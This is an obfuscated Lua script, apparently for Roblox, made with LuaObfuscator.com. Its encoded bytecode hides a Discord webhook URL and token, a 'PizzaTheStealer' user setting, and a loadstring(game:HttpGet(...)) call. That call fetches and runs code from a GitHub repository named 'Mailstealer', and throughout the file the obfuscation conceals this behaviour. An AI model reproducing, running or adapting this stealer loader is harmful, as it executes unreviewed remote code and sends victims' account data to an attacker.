--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0 -(0 -0) ;local v72;while true do if (v71==(0 + 0)) then v72=(v31/(((195 + 684) -(282 + 595))^(v32-(2 -1))))%((3 -(958 -(892 + 65)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (1271 -((417 -191) + 1044)))) ;return v72-(v72%(4 -3)) ;end end else local v73=(933 -(857 + 74))^(v32-(118 -((58 -26) + 85))) ;return (((v31%(v73 + v73))>=v73) and ((919 -(87 + 263)) -(367 + 201))) or (927 -(214 + 713)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=180 -((120 -53) + 113) ;local v35;local v36;local v37;local v38;while true do if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + (9 -5) ;v34=1;end if (v34==(1 + 0 + 0)) then return (v38 * (66680831 -49903615)) + (v37 * (66488 -(802 + 150))) + (v36 * ((1686 -(915 + 82)) -433)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=396 -(115 + 281) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (4~=v39) then else while true do if (v40==(4 -2)) then local v95=0 + 0 ;while true do if ((0 -0)~=v95) then else v45=nil;v46=nil;v95=3 -2 ;end if (v95~=(868 -(550 + 317))) then else v40=323 -(53 + 267) ;break;end end end if (v40==(1 + 0)) then local v96=0 -0 ;while true do if (v96==(414 -(15 + 398))) then v40=2 -0 ;break;end if (0==v96) then v43=nil;v44=nil;v96=1;end end end if (v40~=(8 -5)) then else v47=nil;while true do local v98=982 -(18 + 964) ;while true do if (v98~=(285 -(134 + 151))) then else if ((1668 -(970 + 695))==v41) then local v105=0 -0 ;while true do if (v105==0) then for v123=1 + 0 ,v24() do v43[v123-(1 + 0) ]=v29();end return v45;end end end if (v41~=(1992 -(582 + 1408))) then else local v106=0 -0 ;while true do if ((850 -(20 + 830))~=v106) then else for v125=1 -0 ,v46 do local v126=0;local v127;local v128;local v129;local v130;while true do if (v126==(3 -2)) then v129=nil;v130=nil;v126=2;end if (v126==(1824 -(1195 + 629))) then v127=0;v128=nil;v126=1 + 0 ;end if (v126==(128 -(116 + 10))) then while true do if (v127==(1 -0)) then v130=nil;while true do if (v128~=(241 -(187 + 54))) then else v129=v22();v130=nil;v128=1 -0 ;end if (v128==1) then if (v129==(781 -(162 + 618))) then v130=v22()~=(0 + 0) ;elseif (v129==(2 + 0)) then v130=v25();elseif (v129~=3) then else v130=v26();end v47[v125]=v130;break;end end break;end if (v127~=(0 + 0)) then else v128=0 -0 ;v129=nil;v127=1;end end break;end end end v45[6 -3 ]=v22();v106=2 -1 ;end if (v106~=(1 -0)) then else for v131=1,v24() do local v132=0 + 0 ;local v133;local v134;local v135;while true do if (v132==(1637 -(1373 + 263))) then v135=nil;while true do if (v133==1) then while true do if ((1000 -(451 + 549))~=v134) then else v135=v22();if (v21(v135,3 -2 ,1)==0) then local v211=0 + 0 ;local v212;local v213;local v214;local v215;local v216;while true do if (v211~=(2 -0)) then else v216=nil;while true do if (v212==(377 -(142 + 235))) then v213=0 -0 ;v214=nil;v212=1 + 0 ;end if (v212==1) then v215=nil;v216=nil;v212=2 -0 ;end if (v212==(1386 -(746 + 638))) then while true do if (v213~=(0 + 0)) then else local v218=0 + 0 ;while true do if (v218~=(1 -0)) then else v213=1;break;end if (v218==0) then local v225=341 -(218 + 123) ;while true do if (v225~=(1 + 0)) then else v218=1582 -(1535 + 46) ;break;end if (v225~=(0 + 0)) then else v214=v21(v135,2 + 0 ,1 + 2 );v215=v21(v135,4,566 -(306 + 254) );v225=1 + 0 ;end end end end end if ((5 -2)==v213) then if (v21(v215,7 -4 ,1470 -(899 + 568) )==(1 + 0)) then v216[4]=v47[v216[4]];end v42[v131]=v216;break;end if (v213==(4 -2)) then local v220=603 -(268 + 335) ;local v221;while true do if (0==v220) then v221=290 -(60 + 230) ;while true do if (v221~=(573 -(426 + 146))) then else v213=3;break;end if (v221~=(0 + 0)) then else local v229=0 + 0 ;while true do if (v229==(1456 -(282 + 1174))) then if (v21(v215,1 + 0 ,1)==(1 + 0)) then v216[813 -(569 + 242) ]=v47[v216[4 -2 ]];end if (v21(v215,2,5 -3 )==(1 + 0)) then v216[1205 -(373 + 829) ]=v47[v216[3]];end v229=1025 -(706 + 318) ;end if (v229==(732 -(476 + 255))) then v221=1;break;end end end end break;end end end if (v213~=1) then else local v222=1130 -(369 + 761) ;while true do if (v222==0) then v216={v23(),v23(),nil,nil};if (v214==0) then local v226=0;local v227;local v228;while true do if (v226==0) then local v231=1271 -(945 + 326) ;while true do if (v231==(0 -0)) then v227=0 + 0 ;v228=nil;v231=1;end if (v231~=1) then else v226=1;break;end end end if (v226==(701 -(271 + 429))) then while true do if (v227==(0 -0)) then v228=0;while true do if (v228==0) then v216[339 -(144 + 192) ]=v23();v216[220 -(42 + 174) ]=v23();break;end end break;end end break;end end elseif (v214==(1 + 0)) then v216[1503 -(1408 + 92) ]=v24();elseif (v214==2) then v216[3]=v24() -((1088 -(461 + 625))^16) ;elseif (v214==(1291 -(993 + 295))) then local v237=0;local v238;local v239;while true do if (v237~=(0 + 0)) then else v238=1171 -(418 + 753) ;v239=nil;v237=1505 -(363 + 1141) ;end if ((1 + 0)==v237) then while true do if (v238~=0) then else v239=0;while true do if (0==v239) then v216[1 + 2 ]=v24() -(2^(5 + 11)) ;v216[2 + 2 ]=v23();break;end end break;end end break;end end end v222=530 -(406 + 123) ;end if (v222==(1770 -(1749 + 20))) then v213=1 + 1 ;break;end end end end break;end end break;end if (v211==(1323 -(1249 + 73))) then v214=nil;v215=nil;v211=1977 -(1913 + 62) ;end if (0~=v211) then else v212=0 + 0 ;v213=nil;v211=1 + 0 ;end end end break;end end break;end if (v133==(1145 -(466 + 679))) then local v206=0;local v207;while true do if (v206==(0 -0)) then v207=0 -0 ;while true do if (v207==0) then local v217=1900 -(106 + 1794) ;while true do if (1==v217) then v207=1;break;end if (v217==0) then v134=0;v135=nil;v217=1 + 0 ;end end end if ((1 + 0)~=v207) then else v133=1;break;end end break;end end end end break;end if (v132==0) then v133=0 -0 ;v134=nil;v132=1;end end end v41=3;break;end end end v98=2 -1 ;end if (v98~=(115 -(4 + 110))) then else if (v41~=(2 -1)) then else v45={v42,v43,nil,v44};v46=v24();v47={};v41=105 -(17 + 86) ;end if ((0 + 0)==v41) then local v107=0 -0 ;local v108;while true do if (v107~=(0 -0)) then else v108=166 -(122 + 44) ;while true do if (0~=v108) then else local v180=0 -0 ;while true do if (v180==(1 + 0)) then v108=3 -2 ;break;end if ((0 + 0)==v180) then v42={};v43={};v180=1 + 0 ;end end end if (v108~=1) then else v44={};v41=1614 -(1565 + 48) ;break;end end break;end end end break;end end end break;end if (v40~=(0 + 0)) then else local v97=1138 -(782 + 356) ;while true do if (0==v97) then v41=0;v42=nil;v97=1;end if (v97==(1 -0)) then v40=66 -(30 + 35) ;break;end end end end break;end if (v39~=(270 -(176 + 91))) then else v46=nil;v47=nil;v39=10 -6 ;end if (v39~=(1 + 0)) then else v42=nil;v43=nil;v39=2;end if (v39==(1259 -(1043 + 214))) then v44=nil;v45=nil;v39=3;end if (v39==(0 -0)) then v40=0;v41=nil;v39=1;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1093 -(975 + 117) ;local v51=(v21(v49,1876 -((840 -(483 + 200)) + 1718) ,63 -43 ) * ((2 + 0)^(113 -81))) + v48 ;local v52=v21(v49,71 -50 ,1049 -((2160 -(1404 + 59)) + 321) );local v53=((v21(v49,86 -(147 -93) )==(1899 -(260 + 1638))) and  -(441 -(382 + 58))) or (1 -0) ;if (v52==(0 -0)) then if (v51==0) then return v53 * (0 + 0) ;else v52=1 -0 ;v50=(0 -0) -0 ;end elseif (v52==(4494 -2447)) then return ((v51==(1227 -(322 + 905))) and (v53 * ((612 -(602 + 9))/(1189 -(449 + (1505 -(468 + 297))))))) or (v53 * NaN) ;end return v8(v53,v52-(88 + 935) ) * (v50 + (v51/((1692 -(1121 + 569))^(924 -(826 + 46))))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(562 -(334 + 228))) then return "";end end v55=v3(v16,v19,(v19 + v54) -(3 -2) );v19=v19 + v54 ;local v56={};for v69=1 + 0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 -(163 -(92 + 71)) ;local v59;local v60;while true do if (v58==(1 + 0)) then return (v60 * (492 -(141 + 47 + 48))) + v59 ;end if (v58==(0 + 0)) then v59,v60=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (2 -0) + 0 ;v58=2 -1 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v74=v2(v0(v61,16));if v20 then local v78=v5(v74,v20);v20=nil;return v78;else return v74;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=4) then if (v92<=1) then if (v92==0) then local v109=0;local v110;local v111;while true do if (v109==1) then v89[v110 + 1 ]=v111;v89[v110]=v111[v91[4]];break;end if (v109==0) then v110=v91[2];v111=v89[v91[3]];v109=1;end end else v89[v91[2]]();end elseif (v92<=2) then local v112=0;while true do if (6==v112) then v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];break;end if (v112==0) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v64[v91[3]]=v89[v91[2]];v112=1;end if (v112==3) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v64[v91[3]]=v89[v91[2]];v112=4;end if (v112==5) then v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v112=6;end if (v112==1) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v112=2;end if (v112==2) then v91=v79[v83];v64[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v112=3;end if (4==v112) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v112=5;end end elseif (v92>3) then do return;end else v64[v91[3]]=v89[v91[2]];end elseif (v92<=7) then if (v92<=5) then local v113=v91[2];local v114,v115=v82(v89[v113](v13(v89,v113 + 1 ,v91[3])));v84=(v115 + v113) -1 ;local v116=0;for v120=v113,v84 do v116=v116 + 1 ;v89[v120]=v114[v116];end elseif (v92==6) then local v138=0;local v139;local v140;local v141;local v142;local v143;while true do if (3==v138) then v89[v143 + 1 ]=v142;v89[v143]=v142[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v138=4;end if (v138==0) then v139=nil;v140,v141=nil;v142=nil;v143=nil;v89[v91[2]][v91[3]]=v91[4];v138=1;end if (6==v138) then v89[v143]=v89[v143](v13(v89,v143 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v138=7;end if (v138==1) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v138=2;end if (2==v138) then v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v143=v91[2];v142=v89[v91[3]];v138=3;end if (v138==5) then v139=0;for v204=v143,v84 do local v205=0;while true do if (v205==0) then v139=v139 + 1 ;v89[v204]=v140[v139];break;end end end v83=v83 + 1 ;v91=v79[v83];v143=v91[2];v138=6;end if (v138==4) then v83=v83 + 1 ;v91=v79[v83];v143=v91[2];v140,v141=v82(v89[v143](v13(v89,v143 + 1 ,v91[3])));v84=(v141 + v143) -1 ;v138=5;end if (v138==7) then v91=v79[v83];do return;end break;end end else v89[v91[2]]=v91[3];end elseif (v92<=8) then v89[v91[2]][v91[3]]=v91[4];elseif (v92>9) then local v146=v91[2];v89[v146]=v89[v146](v13(v89,v146 + 1 ,v84));else v89[v91[2]]=v64[v91[3]];end v83=v83 + 1 ;break;end end end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D65030F3O0050692O7A61546865537465616C657203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323533362O37393O333237392O3336342F5A34685A6441476B534E556A427376654D534F2D6335754B4A5F766977444E2O5241593339516F71366667324356396E324D704E79496A5163554464544355584A79554603093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6500143O0012023O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012093O00063O0030063O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000100039O0000026O000100016O00017O00",v9(),...);end
